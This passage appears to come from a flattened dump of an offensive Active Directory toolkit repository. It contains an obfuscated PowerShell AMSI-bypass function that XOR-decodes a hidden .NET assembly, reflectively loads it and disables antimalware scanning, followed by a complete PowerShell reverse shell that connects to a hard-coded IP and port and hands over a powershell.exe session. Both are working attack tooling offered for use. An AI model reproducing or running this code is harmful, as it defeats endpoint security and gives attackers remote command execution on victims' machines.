0,91,35,48,116,88,90,51,53,37,61,112,58,46,94,80,68,57,48,99,124,64,34,48,126,95,65,34,39,23,86,81,36,44,114,81,7,100,66,92,88,70,56,39,123,14,6,120,38,123,81,52,4,54,123,112,91,32,39,90,88,89,57,48,110,61,97,31,44,99,109,64,36,66,120,77,107,19,58,103,81,93,53,43,99,61,118,47,54,114,61,121,55,48,100,85,85,58,66,86,81,88,57,33,95,122,88,57,32,118,81,52,21,45,103,68,52,31,44,99,109,64,36,66,120,77,107,23,38,115,84,64,63,45,121,61,119,57,44,100,82,88,51,66,64,79,93,34,39,91,84,90,51,66,23,61,37,55,66,122,61,71,86,43,23,19,52,50,66,123,61,88,86,66,10,124,52,59,66,100,61,93,86,17,23,94,52,55,66,121,61,118,86,55,23,91,52,48,66,114,61,70,86,66,32,112,52,51,66,122,61,91,86,48,23,68,52,118,66,103,61,85,86,54,23,94,52,62,66,114,61,80,86,98,23,78,52,35,66,116,61,87,86,39,23,78,52,37,66,113,61,65,86,46,23,68,52,120,66,23,61,52,86,197,238,135,238,177,225,85,119,135,0,136,119,191,70,188,86,23,53,131,44,30,65,36,0,182,203,18,61,54,78,90,25,57,52,87,90,25,53,52,82,64,15,36,61,70,75,17,61,55,87,90,15,53,55,86,66,22,62,20,86,67,19,29,53,87,74,19,29,53,87,76,19,61,53,79,75,19,61,53,78,74,31,61,48,87,95,18,53,44,94,71,23,63,44,78,74,19,61,53,87,76,2,58,57,78,90,14,52,41,83,95,18,32,49,78,90,15,32,49,75,71,10,56,60,87,66,31,61,52,86,66,23,35,53,86,67,23,105,54,64,21,101,92,68,24,45,121,120,76,53,39,103,73,93,57,44,67,85,70,57,53,100,60,52,254,100,23,61,52,86,66,23,61,52,86,66,169,27,52,86,66,55,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,230,100,23,61,52,86,66,23,61,52,9,1,120,79,112,58,46,90,92,93,56,66,122,78,87,57,48,114,88,26,50,46,123,61,52,86,66,23,194,17,86,98,23,45,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,60,52,70,66,23,61,44,86,66,151,61,52,86,66,23,61,52,86,66,23,61,52,86,66,22,61,53,86,66,23,13,52,86,194,23,61,52,86,66,23,61,52,86,66,23,61,52,86,67,23,61,52,86,66,95,61,52,86,26,87,61,52,2,64,23,61,52,86,66,23,61,52,86,66,67,63,0,86,66,23,107,52,5,66,72,61,98,86,7,23,111,52,5,66,94,61,123,86,12,23,98,52,31,66,89,61,114,86,13,23,61,52,86,66,170,57,219,168,66,23,60,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,125,23,61,52,86,66,23,61,48,86,66,23,63,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,112,86,66,23,60,52,0,66,118,61,70,86,4,23,84,52,58,66,114,61,125,86,44,23,91,52,57,66,23,61,52,86,102,23,57,52,86,66,67,61,70,86,35,23,83,52,37,66,123,61,85,86,54,23,84,52,57,66,121,61,52,86,66,23,61,52,230,70,163,60,52,86,67,23,110,52,34,66,101,61,93,86,44,23,90,52,16,66,126,61,88,86,39,23,116,52,56,66,113,61,91,86,66,23,173,53,86,66,22,61,4,86,114,23,13,52,102,66,39,61,0,86,32,23,13,52,86,66,59,61,54,86,67,23,123,52,63,66,123,61,81,86,6,23,88,52,37,66,116,61,70,86,43,23,77,52,34,66,126,61,91,86,44,23,61,52,86,66,55,61,52,86,114,23,53,52,87,66,81,61,93,86,46,23,88,52,0,66,114,61,70,86,49,23,84,52,57,66,121,61,52,86,66,23,13,52,120,66,39,61,26,86,114,23,19,52,102,66,23,61,116,86,77,23,60,52,31,66,121,61,64,86,39,23,79,52,56,66,118,61,88,86,12,23,92,52,59,66,114,61,52,86,17,23,82,52,35,66,101,61,87,86,39,23,83,52,51,66,96,61,6,86,108,23,89,52,58,66,123,61,52,86,66,23,21,52,84,66,22,61,120,86,39,23,90,52,55,66,123,61,119,86,45,23,77,52,47,66,101,61,93,86,37,23,85,52,34,66,23,61,20,86,66,23,117,52,89,66,22,61,123,86,48,23,84,52,49,66,126,61,90,86,35,23,81,52,16,66,126,61,88,86,39,23,83,52,55,66,122,61,81,86,66,23,110,52,57,66,98,61,70,86,33,23,88,52,56,66,114,61,67,86,112,23,19,52,50,66,123,61,88,86,66,23,61,52,98,66,31,61,53,86,18,23,79,52,57,66,115,61,65,86,33,23,73,52,0,66,114,61,70,86,49,23,84,52,57,66,121,61,52,86,114,23,19,52,102,66,57,61,4,86,108,23,13,52,86,66,47,61,60,86,67,23,124,52,37,66,100,61,81,86,47,23,95,52,58,66,110,61,20,86,20,23,88,52,36,66,100,61,93,86,45,23,83,52,86,66,39,61,26,86,114,23,19,52,102,66,57,61,4,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,20,86,66,27,61,52,86,146,33,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52) 5 | $KeyArray = @(52, 86, 66, 23, 61) 6 | $keyposition = 0 7 | for ($i = 0; $i -lt $byteArray.count; $i++) 8 | { 9 | $byteArray[$i] = $byteArray[$i] -bxor $KeyArray[$keyposition] 10 | $keyposition += 1 11 | if ($keyposition -eq $keyArray.Length) { $keyposition = 0 } 12 | } 13 | [Reflection.Assembly]::Load([byte[]]$byteArray) | Out-Null 14 | Write-Output "DLL has been reflected" 15 | } 16 | [BP.AMS]::Disable() 17 | } 18 | 19 | 20 | AMSBP 21 | 22 | -------------------------------------------------------------------------------- /ps/amsi-bypass_k.txt: -------------------------------------------------------------------------------- 1 | function AMSBP 2 | { 3 | if (-not ([System.Management.Automation.PSTypeName]"BP.AMS").Type) { 4 | $byteArray = @(121,12,210,23,62,52,86,66,19,61,52,86,189,232,61,52,238,66,23,61,52,86,66,23,125,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,180,86,66,23,51,43,236,76,23,137,61,155,99,175,60,120,155,99,67,85,93,37,98,103,79,91,49,48,118,80,20,53,35,121,83,91,34,98,117,88,20,36,55,121,29,93,56,98,83,114,103,118,47,120,89,81,120,79,26,55,16,86,66,23,61,52,86,66,71,120,52,86,14,22,62,52,223,244,211,96,52,86,66,23,61,52,86,66,247,61,54,119,73,22,54,52,86,74,23,61,52,80,66,23,61,52,86,66,217,27,52,86,66,55,61,52,86,2,23,61,52,86,66,7,61,20,86,66,23,63,52,86,70,23,61,52,86,66,23,61,48,86,66,23,61,52,86,66,23,189,52,86,66,21,61,52,86,66,23,61,55,86,2,146,61,52,70,66,23,45,52,86,66,23,45,52,86,82,23,61,52,86,66,23,45,52,86,66,23,61,52,86,66,23,61,52,214,100,23,61,127,86,66,23,61,116,86,66,167,63,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,93,52,86,78,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,20,86,66,31,61,52,86,66,23,61,52,86,66,23,61,60,118,66,23,117,52,86,66,23,61,52,86,66,23,61,52,120,54,114,69,64,86,66,23,233,50,86,66,23,29,52,86,66,31,61,52,86,64,23,61,52,86,66,23,61,52,86,66,23,61,52,86,98,23,61,84,120,48,100,79,87,86,66,23,141,54,86,66,23,125,52,86,66,19,61,52,86,72,23,61,52,86,66,23,61,52,86,66,23,61,52,86,2,23,61,116,120,48,114,81,91,53,66,23,49,52,86,66,23,93,52,86,66,21,61,52,86,76,23,61,52,86,66,23,61,52,86,66,23,61,52,86,2,23,61,118,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,242,49,61,52,86,66,23,61,124,86,66,23,63,52,83,66,87,28,52,86,2,18,61,52,87,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,81,39,57,52,138,66,23,61,53,86,66,6,79,53,86,66,103,21,54,86,66,17,55,50,36,81,23,61,68,126,67,23,61,50,93,89,63,56,52,86,72,27,43,57,81,74,8,125,38,85,106,20,61,52,80,100,0,176,51,86,66,22,46,62,71,72,1,34,5,202,83,29,46,48,65,207,16,61,52,87,81,28,44,63,64,98,232,61,52,86,222,6,54,39,83,85,154,58,52,86,67,4,49,37,90,84,55,173,52,86,66,139,44,56,69,68,0,21,50,86,66,29,46,51,71,70,1,44,51,65,106,16,61,52,92,69,8,38,28,94,66,23,55,37,81,85,63,57,52,86,68,0,21,50,86,66,29,46,60,71,71,1,44,60,65,106,16,61,52,92,69,8,33,28,94,66,23,55,37,94,85,63,57,52,86,68,0,21,50,86,66,29,46,61,71,68,1,44,61,65,106,16,61,52,92,69,8,32,28,94,66,23,55,37,95,85,63,57,52,86,68,101,12,52,86,50,63,52,52,86,72,61,35,54,126,72,23,61,62,124,0,68,119,118,87,66,22,61,52,86,66,23,49,52,86,66,97,9,26,102,108,36,13,7,103,123,23,61,52,86,71,23,81,52,86,66,195,60,52,86,97,105,61,52,22,64,23,61,196,87,66,23,30,103,34,48,126,83,83,37,66,23,61,52,102,70,23,61,88,86,66,23,30,97,5,66,139,57,52,86,82,23,61,52,117,5,66,116,112,86,66,23,145,48,86,66,131,61,52,86,97,85,81,91,52,66,23,61,52,86,66,23,63,52,86,67,80,40,54,66,75,23,61,52,86,184,50,14,52,64,66,23,60,52,86,66,29,61,52,86,64,23,61,52,80,66,23,61,62,86,66,23,55,52,86,66,21,61,52,86,67,23,61,52,84,66,23,61,48,86,66,23,60,52,86,66,22,61,52,86,66,23,55,52,87,66,23,61,52,86,68,23,13,52,127,66,17,61,232,86,255,23,59,52,65,67,224,61,50,86,117,22,202,52,80,66,119,60,137,86,68,23,170,53,127,66,17,61,159,87,107,23,59,52,230,67,170,61,50,86,136,22,20,52,80,66,202,60,29,86,66,23,61,52,87,66,23,61,52,86,67,23,60,52,87,66,7,61,45,86,95,23,56,52,87,66,22,61,52,86,66,23,189,52,192,98,32,61,62,86,67,23,61,52,86,66,151,61,162,118,4,23,45,52,85,66,23,61,52,86,194,23,171,20,4,66,2,61,48,86,66,23,61,52,214,66,134,29,85,86,92,23,53,52,6,98,23,61,52,86,212,23,81,52,115,66,28,61,12,119,66,23,61,52,208,90,99,61,29,86,73,23,61,52,87,66,109,61,52,86,64,23,191,52,86,66,22,61,191,86,66,23,60,52,198,66,23,61,54,86,216,23,61,52,85,66,182,61,54,86,70,23,147,52,86,66,22,61,221,86,66,23,63,52,184,66,23,61,55,86,176,23,44,52,34,66,62,61,45,86,54,23,16,52,119,66,99,61,29,86,107,23,73,52,100,66,38,61,171,87,117,23,124,52,238,67,43,61,117,86,135,22,124,52,31,66,198,60,126,86,19,23,216,53,6,66,30,61,64,86,107,23,19,52,69,66,124,61,26,86,89,23,73,52,3,66,100,60,72,87,66,22,62,52,97,66,22,61,52,87,71,23,123,52,87,66,23,60,51,86,16,23,60,52,86,67,30,61,189,87,64,23,57,180,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,23,22,61,52,82,66,23,61,52,86,66,23,61,52,86,66,22,61,20,86,66,23,61,52,86,66,23,1,121,57,38,98,81,81,104,66,68,82,65,36,33,114,83,81,33,112,57,89,88,58,66,86,112,103,86,0,71,61,89,37,33,120,79,88,63,32,23,110,77,37,54,114,80,52,25,32,125,88,87,34,66,80,88,64,6,48,120,94,117,50,38,101,88,71,37,66,91,82,85,50,14,126,95,70,55,48,110,61,98,63,48,99,72,85,58,18,101,82,64,51,33,99,61,121,57,52,114,112,81,59,45,101,68,52,18,43,100,92,86,58,39,23,19,87,34,45,101,61,92,27,45,115,72,88,51,66,103,79,91,53,12,118,80,81,86,44,118,80,81,86,46,103,124,80,50,48,114,78,71,86,38,96,110,93,44,39,23,91,88,24,39,96,109,70,57,54,114,94,64,86,46,103,91,88,25,46,115,109,70,57,54,114,94,64,86,17,110,78,64,51,47,57,111,65,56,54,126,80,81,120,11,121,73,81,36,45,103,110,81,36,52,126,94,81,37,66,88,72,64,23,54,99,79,93,52,55,99,88,52,50,39,100,73,52,37,48,116,61,71,63,56,114,61,103,47,49,99,88,89,120,16,98,83,64,63,47,114,19,119,57,47,103,84,88,51,48,68,88,70,32,43,116,88,71,86,1,120,80,68,63,46,118,73,93,57,44,69,88,88,55,58,118,73,93,57,44,100,124,64,34,48,126,95,65,34,39,23,111,65,56,54,126,80,81,21,45,122,77,85,34,43,117,84,88,63,54,110,124,64,34,48,126,95,65,34,39,23,110,91,35,48,116,88,90,51,53,37,61,112,58,46,94,80,68,57,48,99,124,64,34,48,126,95,65,34,39,23,86,81,36,44,114,81,7,100,66,92,88,70,56,39,123,14,6,120,38,123,81,52,4,54,123,112,91,32,39,90,88,89,57,48,110,61,97,31,44,99,109,64,36,66,120,77,107,19,58,103,81,93,53,43,99,61,118,47,54,114,61,121,55,48,100,85,85,58,66,86,81,88,57,33,95,122,88,57,32,118,81,52,21,45,103,68,52,31,44,99,109,64,36,66,120,77,107,23,38,115,84,64,63,45,121,61,119,57,44,100,82,88,51,66,64,79,93,34,39,91,84,90,51,66,23,61,37,55,66,122,61,71,86,43,23,19,52,50,66,123,61,88,86,66,10,124,52,59,66,100,61,93,86,17,23,94,52,55,66,121,61,118,86,55,23,91,52,48,66,114,61,70,86,66,32,112,52,51,66,122,61,91,86,48,23,68,52,118,66,103,61,85,86,54,23,94,52,62,66,114,61,80,86,98,23,78,52,35,66,116,61,87,86,39,23,78,52,37,66,113,61,65,86,46,23,68,52,120,66,23,61,52,86,197,238,135,238,177,225,85,119,135,0,136,119,191,70,188,86,23,53,131,44,30,65,36,0,182,203,18,61,54,78,90,25,57,52,87,90,25,53,52,82,64,15,36,61,70,75,17,61,55,87,90,15,53,55,86,66,22,62,20,86,67,19,29,53,87,74,19,29,53,87,76,19,61,53,79,75,19,61,53,78,74,31,61,48,87,95,18,53,44,94,71,23,63,44,78,74,19,61,53,87,76,2,58,57,78,90,14,52,41,83,95,18,32,49,78,90,15,32,49,75,71,10,56,60,87,66,31,61,52,86,66,23,35,53,86,67,23,105,54,64,21,101,92,68,24,45,121,120,76,53,39,103,73,93,57,44,67,85,70,57,53,100,60,52,254,100,23,61,52,86,66,23,61,52,86,66,169,27,52,86,66,55,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,230,100,23,61,52,86,66,23,61,52,9,1,120,79,112,58,46,90,92,93,56,66,122,78,87,57,48,114,88,26,50,46,123,61,52,86,66,23,194,17,86,98,23,45,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,60,52,70,66,23,61,44,86,66,151,61,52,86,66,23,61,52,86,66,23,61,52,86,66,22,61,53,86,66,23,13,52,86,194,23,61,52,86,66,23,61,52,86,66,23,61,52,86,67,23,61,52,86,66,95,61,52,86,26,87,61,52,2,64,23,61,52,86,66,23,61,52,86,66,67,63,0,86,66,23,107,52,5,66,72,61,98,86,7,23,111,52,5,66,94,61,123,86,12,23,98,52,31,66,89,61,114,86,13,23,61,52,86,66,170,57,219,168,66,23,60,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,125,23,61,52,86,66,23,61,48,86,66,23,63,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,112,86,66,23,60,52,0,66,118,61,70,86,4,23,84,52,58,66,114,61,125,86,44,23,91,52,57,66,23,61,52,86,102,23,57,52,86,66,67,61,70,86,35,23,83,52,37,66,123,61,85,86,54,23,84,52,57,66,121,61,52,86,66,23,61,52,230,70,163,60,52,86,67,23,110,52,34,66,101,61,93,86,44,23,90,52,16,66,126,61,88,86,39,23,116,52,56,66,113,61,91,86,66,23,173,53,86,66,22,61,4,86,114,23,13,52,102,66,39,61,0,86,32,23,13,52,86,66,59,61,54,86,67,23,123,52,63,66,123,61,81,86,6,23,88,52,37,66,116,61,70,86,43,23,77,52,34,66,126,61,91,86,44,23,61,52,86,66,55,61,52,86,114,23,53,52,87,66,81,61,93,86,46,23,88,52,0,66,114,61,70,86,49,23,84,52,57,66,121,61,52,86,66,23,13,52,120,66,39,61,26,86,114,23,19,52,102,66,23,61,116,86,77,23,60,52,31,66,121,61,64,86,39,23,79,52,56,66,118,61,88,86,12,23,92,52,59,66,114,61,52,86,17,23,82,52,35,66,101,61,87,86,39,23,83,52,51,66,96,61,6,86,108,23,89,52,58,66,123,61,52,86,66,23,21,52,84,66,22,61,120,86,39,23,90,52,55,66,123,61,119,86,45,23,77,52,47,66,101,61,93,86,37,23,85,52,34,66,23,61,20,86,66,23,117,52,89,66,22,61,123,86,48,23,84,52,49,66,126,61,90,86,35,23,81,52,16,66,126,61,88,86,39,23,83,52,55,66,122,61,81,86,66,23,110,52,57,66,98,61,70,86,33,23,88,52,56,66,114,61,67,86,112,23,19,52,50,66,123,61,88,86,66,23,61,52,98,66,31,61,53,86,18,23,79,52,57,66,115,61,65,86,33,23,73,52,0,66,114,61,70,86,49,23,84,52,57,66,121,61,52,86,114,23,19,52,102,66,57,61,4,86,108,23,13,52,86,66,47,61,60,86,67,23,124,52,37,66,100,61,81,86,47,23,95,52,58,66,110,61,20,86,20,23,88,52,36,66,100,61,93,86,45,23,83,52,86,66,39,61,26,86,114,23,19,52,102,66,57,61,4,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,20,86,66,27,61,52,86,146,33,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52) 5 | $KeyArray = @(52, 86, 66, 23, 61) 6 | $keyposition = 0 7 | for ($i = 0; $i -lt $byteArray.count; $i++) 8 | { 9 | $byteArray[$i] = $byteArray[$i] -bxor $KeyArray[$keyposition] 10 | $keyposition += 1 11 | if ($keyposition -eq $keyArray.Length) { $keyposition = 0 } 12 | } 13 | [Reflection.Assembly]::Load([byte[]]$byteArray) | Out-Null 14 | Write-Output "DLL has been reflected" 15 | } 16 | [BP.AMS]::Disable() 17 | } 18 | 19 | 20 | AMSBP 21 | 22 | -------------------------------------------------------------------------------- /ps/nc.txt: -------------------------------------------------------------------------------- 1 | function cleanup { 2 | if ($client.Connected -eq $true) {$client.Close()} 3 | if ($process.ExitCode -ne $null) {$process.Close()} 4 | exit} 5 | // Setup IPADDR 6 | $address = '192.168.49.82' 7 | // Setup PORT 8 | $port = '8080' 9 | $client = New-Object system.net.sockets.tcpclient 10 | $client.connect($address,$port) 11 | $stream = $client.GetStream() 12 | $networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize 13 | $process = New-Object System.Diagnostics.Process 14 | $process.StartInfo.FileName = 'C:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe' 15 | $process.StartInfo.RedirectStandardInput = 1 16 | $process.StartInfo.RedirectStandardOutput = 1 17 | $process.StartInfo.UseShellExecute = 0 18 | $process.Start() 19 | $inputstream = $process.StandardInput 20 | $outputstream = $process.StandardOutput 21 | Start-Sleep 1 22 | $encoding = new-object System.Text.AsciiEncoding 23 | while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())} 24 | $stream.Write($encoding.GetBytes($out),0,$out.Length) 25 | $out = $null; $done = $false; $testing = 0; 26 | while (-not $done) { 27 | if ($client.Connected -ne $true) {cleanup} 28 | $pos = 0; $i = 1 29 | while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) { 30 | $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos) 31 | $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}} 32 | if ($pos -gt 0) { 33 | $string = $encoding.GetString($networkbuffer,0,$pos) 34 | $inputstream.write($string) 35 | start-sleep 1 36 | if ($process.ExitCode -ne $null) {cleanup} 37 | else { 38 | $out = $encoding.GetString($outputstream.Read()) 39 | while($outputstream.Peek() -ne -1){ 40 | $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}} 41 | $stream.Write($encoding.GetBytes($out),0,$out.length) 42 | $out = $null 43 | $string = $null}} else {cleanup}} 44 | -------------------------------------------------------------------------------- /ps_obf/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/ps_obf/.DS_Store -------------------------------------------------------------------------------- /tools/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/tools/.DS_Store -------------------------------------------------------------------------------- /xml/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/xml/.DS_Store -------------------------------------------------------------------------------- /xml/powershell-repl.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 9 | 10 | 11 | 12 | 13 | /pwcmd")) 35 | { 36 | if (lastUpdated != null) 37 | { 38 | 